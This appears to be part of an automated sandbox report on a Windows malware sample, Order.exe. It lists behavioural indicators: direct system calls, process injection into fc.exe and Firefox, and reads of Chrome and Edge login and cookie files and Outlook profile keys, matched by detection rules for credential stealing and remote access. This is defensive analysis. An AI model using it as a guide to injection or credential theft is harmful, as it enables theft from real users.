                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC310 mov ecx, dword ptr fs:[00000030h]9_2_019BC310
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov ecx, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E0310 mov ecx, dword ptr fs:[00000030h]9_2_019E0310
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6437C mov eax, dword ptr fs:[00000030h]9_2_01A6437C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9634F mov eax, dword ptr fs:[00000030h]9_2_01A9634F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A68350 mov ecx, dword ptr fs:[00000030h]9_2_01A68350
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov ecx, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8A352 mov eax, dword ptr fs:[00000030h]9_2_01A8A352
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov ecx, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE284 mov eax, dword ptr fs:[00000030h]9_2_019FE284
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE284 mov eax, dword ptr fs:[00000030h]9_2_019FE284
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02A0 mov eax, dword ptr fs:[00000030h]9_2_019D02A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02A0 mov eax, dword ptr fs:[00000030h]9_2_019D02A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A962D6 mov eax, dword ptr fs:[00000030h]9_2_01A962D6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B823B mov eax, dword ptr fs:[00000030h]9_2_019B823B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6259 mov eax, dword ptr fs:[00000030h]9_2_019C6259
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA250 mov eax, dword ptr fs:[00000030h]9_2_019BA250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A48243 mov eax, dword ptr fs:[00000030h]9_2_01A48243
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A48243 mov ecx, dword ptr fs:[00000030h]9_2_01A48243
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B826B mov eax, dword ptr fs:[00000030h]9_2_019B826B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9625D mov eax, dword ptr fs:[00000030h]9_2_01A9625D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A250 mov eax, dword ptr fs:[00000030h]9_2_01A7A250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A250 mov eax, dword ptr fs:[00000030h]9_2_01A7A250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE59C mov eax, dword ptr fs:[00000030h]9_2_019FE59C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F4588 mov eax, dword ptr fs:[00000030h]9_2_019F4588
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2582 mov eax, dword ptr fs:[00000030h]9_2_019C2582
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2582 mov ecx, dword ptr fs:[00000030h]9_2_019C2582
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E45B1 mov eax, dword ptr fs:[00000030h]9_2_019E45B1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E45B1 mov eax, dword ptr fs:[00000030h]9_2_019E45B1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C65D0 mov eax, dword ptr fs:[00000030h]9_2_019C65D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA5D0 mov eax, dword ptr fs:[00000030h]9_2_019FA5D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA5D0 mov eax, dword ptr fs:[00000030h]9_2_019FA5D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE5CF mov eax, dword ptr fs:[00000030h]9_2_019FE5CF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE5CF mov eax, dword ptr fs:[00000030h]9_2_019FE5CF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC5ED mov eax, dword ptr fs:[00000030h]9_2_019FC5ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC5ED mov eax, dword ptr fs:[00000030h]9_2_019FC5ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\Order.exe | Memory written: C:\Users\user\Desktop\Order.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: read write
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe | Thread register set: target process: 5908
                Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Users\user\Desktop\Order.exe VolumeInformation
                Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara match | File source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\fc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Source: Yara match | File source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
